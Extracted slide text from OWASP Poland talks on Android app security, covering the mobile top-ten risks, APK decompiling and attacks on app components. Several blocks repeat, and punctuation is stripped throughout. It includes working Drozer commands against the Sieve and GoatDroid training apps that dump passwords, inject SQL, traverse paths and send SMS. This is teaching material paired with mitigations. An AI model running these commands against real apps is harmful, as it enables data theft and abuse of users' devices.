bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Linux Kernelbull The architecture is based on the Linux ( started from 26)
kernel bull This layer is core of android architecture It provides
service like power management memory management security etc
bull It helps in software or hardware binding for better communication
Librariesbull The next layer is the Androidrsquos native libraries bull It is this layer that enables the device to handle different types
of data bull The WebKit library is responsible for browser support SQLite is
for database FreeType for font support Media for playing and recording audio and video formats
Android Runtimebull Core librariesbull Dalvik Virtual Machinebull DVM vs JVM Differencesbull ART
Dalvik VMbull The software that runs the apps on Android devicesbull Its fast even on weak CPUs bull it will run on systems with little memory bull it will run in an energy-efficient way bull Provides application portability and runtime consistency bull Runs optimized file format (dex) and Dalvik bytecodebull Java class jar files converted to dex at build time
ART VS DVMbull Android 44 ndash Experimental From android 50 - Defaultbull Ahead-of-time (AOT) compilationbull Improved garbage collectionbull Improved diagnostic detail in exceptions and crash reports
Application FrameworkActivity Manager Manages the activity life cycle of applications
Content Providers Manage the data sharing between applications
Telephony Manager Manages all voice calls
Location Manager Location management using GPS or cell tower
Resource Manager Manage the various types of resources we use in our Application
Application Layer bull SMS client appbull Dialerbull Web browserbull Contact manager
APK how itrsquos works
Android Application Security
bull Android sandbox
bull Permission labels defined in AndroidManifestxml
bull Signature
bull Install time security decisionsbull Android 60 Security release
Android 60bull Runtime Permissionsbull Verified Bootbull Hardware-Isolated Security bull Fingerprintsbull SD Card Adoptionbull Clear Text Traffic bull System Hardeningbull USB Access Control
Defense layers
Google Play
1 2 3 4 5
Require and validate
Developer information
Review Applications
before distribution
Permanently stop
distribution
Reduce attacker flexibility
Remove applications
after installation
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps
The vast majority of installs come from Google Play
Verify AppsApps are verified prior to install
Warn for or block Potentially Harmful Applications
Over 10 million installs verified every day
Verifying is on and visible when need
Core security features to build secure applicaton
bull The Android Application Sandboxbull An application framework with robust implementations of common
security functionality such as cryptography permissionsbull An encrypted file system that can be enabled to protect data on lost
or stolen devicesbull User-granted permissions to restrict access to system features and
user databull Application-defined permissions to control application data on a
per-app basis
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Librariesbull The next layer is the Androidrsquos native libraries bull It is this layer that enables the device to handle different types
of data bull The WebKit library is responsible for browser support SQLite is
for database FreeType for font support Media for playing and recording audio and video formats
Android Runtimebull Core librariesbull Dalvik Virtual Machinebull DVM vs JVM Differencesbull ART
Dalvik VMbull The software that runs the apps on Android devicesbull Its fast even on weak CPUs bull it will run on systems with little memory bull it will run in an energy-efficient way bull Provides application portability and runtime consistency bull Runs optimized file format (dex) and Dalvik bytecodebull Java class jar files converted to dex at build time
